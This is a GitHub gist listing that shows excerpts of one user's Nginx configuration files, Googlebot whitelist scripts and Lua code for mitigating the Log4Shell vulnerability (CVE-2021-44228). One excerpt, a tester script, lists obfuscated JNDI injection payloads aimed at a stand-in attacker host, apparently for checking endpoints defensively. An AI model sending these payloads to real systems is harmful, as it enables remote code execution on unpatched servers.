John H Patton johnhpatton

johnhpatton / keyvals.conf
Created February 17, 2022 02:24
Nginx Plus KeyVal to hold whitelisted IP address blocks
stream {
# Set resolver to a name server that can resolve the domain
# for the zone_sync_server DNS to all webtier IPs.
resolver 10.0.0.1;
server {
listen 9443 reuseport;
zone_sync;
zone_sync_server api.prod.int.example.com:9443 resolve;
johnhpatton / update-googlebot-whitelist-keyval.sh
Created February 17, 2022 02:18
Updates keyval configured in nginx-plus with IP address blocks for a whitelist.
#!/usr/bin/env bash
# update-googlebot-whitelist-keyval.sh
#
#
# Cron daily with this format:
# 0 0 * * * /usr/local/bin/update-googlebot-whitelist-keyval.sh &>/dev/null
# Check for dependencies, this process requires curl and jq:
if ! type -P curl &>/dev/null; then
johnhpatton / whitelist.conf
Created February 16, 2022 13:27
Create a whitelist variable from inputs
# whitelist.conf
# Geo maps that build a $whitelist map variable.
#
# NOTES
# * This relies on an $is_google geo map set in a separate .conf file.
# * Update $remote_addr used in the maps to a variable that holds the
# real client IP address, or set a proxy configuration in the geo
# map. See the documentation for guidance.
# * Using $remote_addr in geo maps is not required and is the default
# variable used in the lookup. If setting a proxy configuration in
johnhpatton / generate-nginx-googlebot-whitelist.sh
Created February 15, 2022 20:17
Googlebot whitelist nginx map generator
#!/usr/bin/env bash
# generate-nginx-googlebot-whitelist.sh
#
# Cron daily with this format:
# 0 0 * * * /usr/local/bin/generate-nginx-googlebot-whitelist.sh reload &>/dev/null
# Update GOOGLE_WHITELIST_CONF to point to a configuration file that is included
GOOGLE_WHITELIST_CONF="/etc/nginx/conf.d/google-whitelist.conf"
# Update RELOAD_CMD with the command used to reload the nginx configuration
johnhpatton / cve-2021-44228-tester.sh
Last active December 15, 2021 14:08
Tests log4shell patterns against an endpoint using curl
declare -a PATTERNS=()
PATTERNS+=('${jndi:ldap:attacker_controled_website/payload_to_be_executed}')
PATTERNS+=('${j${k8s:k5:-ND}i${sd:k5:-:}}')
PATTERNS+=('${j${main:\k5:-Nd}i${spring:k5:-:}}')
PATTERNS+=('${j${sys:k5:-nD}${lower:i${web:k5:-:}}}')
PATTERNS+=('${j${::-nD}i${::-:}}')
PATTERNS+=('${j${EnV:K5:-nD}i:}')
PATTERNS+=('${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}attacker_controled_website/payload_to_be_executed}')
PATTERNS+=('${j${loWer:Nd}i${uPper::}}')
PATTERNS+=('${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://attacker_controled_website/payload_to_be_executed }')
johnhpatton / cve_2021_44228.lua
Created December 15, 2021 12:59
Nginx + Lua to mitigate CVE-2021-44228
-- -*- location: /etc/nginx/conf.d/cve_2021_44228.lua; -*-
-- -*- mode: lua; -*-
-- -*- author: John H Patton; -*-
-- -*- email: [email protected]; -*-
-- -*- license: MIT License; -*-
--
-- Copyright 2021 JH Patton Consulting, LLC
--
-- Permission is hereby granted, free of charge, to any person obtaining a copy of this
-- software and associated documentation files (the "Software"), to deal in the Software
johnhpatton / cve_2021_44228.lua
Last active December 19, 2021 17:19
Nginx + Lua to mitigate CVE-2021-44228
-- -*- location: /etc/nginx/conf.d/cve_2021_44228.lua; -*-
-- -*- mode: lua; -*-
-- -*- author: John H Patton; -*-
-- -*- email: [email protected]; -*-
-- -*- license: MIT License; -*-
--
-- Copyright 2021 JH Patton Consulting, LLC
--
-- Permission is hereby granted, free of charge, to any person obtaining a copy of this
-- software and associated documentation files (the "Software"), to deal in the Software
johnhpatton / default.conf
Created December 13, 2021 17:22
Nginx + Lua to mitigate CVE-2021-44228
# /etc/nginx/conf.d/default.conf
server {
listen 80 default_server;
server_name localhost;
set $captured_request_headers "";
set $captured_request_body "";
set $cve_2021_44228_log "";
rewrite_by_lua_block {
cve_2021_44228.block_cve_2021_44228()
johnhpatton / lua.conf
Created December 13, 2021 11:17
Nginx + Lua to mitigate CVE-2021-44228
# /etc/nginx/conf.d/lua.conf
# GLOBAL LUA -- HTTP BLOCK LEVEL
# Lua locations
# $prefix is the server prefix ( -p {server_prefix} ) passed in
# to nginx at startup, or the default build prefix (/etc/nginx/).
lua_package_path "${prefix}conf.d/?.lua;/usr/local/lib/lua/?.lua;;";
lua_package_cpath "/usr/lib64/lua/5.1/?.so;;";
# Disable logging cosocket lua TCP socket read timeout.
johnhpatton / nginx.conf
Last active December 13, 2021 11:15
Nginx + Lua to mitigate CVE-2021-44228
# /etc/nginx/nginx.conf
# nginx plus implementation for RHEL hosts
load_module modules/ndk_http_module.so;
load_module modules/ngx_http_lua_module.so;
error_log /var/log/nginx/error.log error;
pid /var/run/nginx.pid;
lock_file /var/lock/nginx.lock;
worker_processes auto;